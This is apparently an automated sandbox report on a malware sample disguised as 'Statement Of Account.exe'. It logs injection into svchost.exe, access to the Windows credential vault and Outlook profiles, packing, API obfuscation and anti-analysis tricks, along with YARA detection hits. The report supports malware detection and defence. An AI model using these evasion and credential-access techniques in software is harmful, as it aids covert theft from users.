Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: wntdll.pdbUGP source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000000.00000003.2057153434.0000000004320000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076396476.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000003.00000003.2076232041.0000000004230000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102408875.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000005.00000003.2102240700.0000000004240000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119966294.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000007.00000003.2119814778.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2138938581.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Statement Of Account.exe, 00000009.00000003.2135998807.0000000004250000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: svchost.pdbUGP source: svchost.exe, 0000000A.00000002.3295715813.0000000000121000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation
barindex
Yara detected aPLib compressed binary
Source: Yara match File source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004171D1 push ecx; ret 3_2_004171E4
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7E808 push edx; ret 5_2_03C7E812
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7EA31 push esp; retf 5_2_03C7EA32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00402AC0 push eax; ret 10_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00402AC0 push eax; ret 10_2_00402AFC
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess, 10_2_00123360
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_004772DE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_004375B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00444078 0_2_00444078
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00444078 3_2_00444078
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Statement Of Account.exe API/Special instruction interceptor: Address: 3E4EE5C
